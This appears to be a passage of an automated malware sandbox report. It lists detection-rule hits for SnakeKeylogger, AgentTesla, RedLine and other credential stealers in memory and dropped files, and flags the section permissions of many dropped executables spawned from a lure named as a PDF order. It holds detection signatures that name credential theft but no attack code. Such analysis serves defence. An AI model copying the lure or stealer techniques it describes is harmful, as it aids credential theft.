Source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000019.00000002.1863278760.0000000004050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.1725995787.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1731407084.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: Order SMG 201906 20190816order.pdf.scr.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: surmit.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Integrator.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRLogTransport.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRWindowsClientService.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eula.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: LogTransport2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Order SMG 201906 20190816order.pdf.scr.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
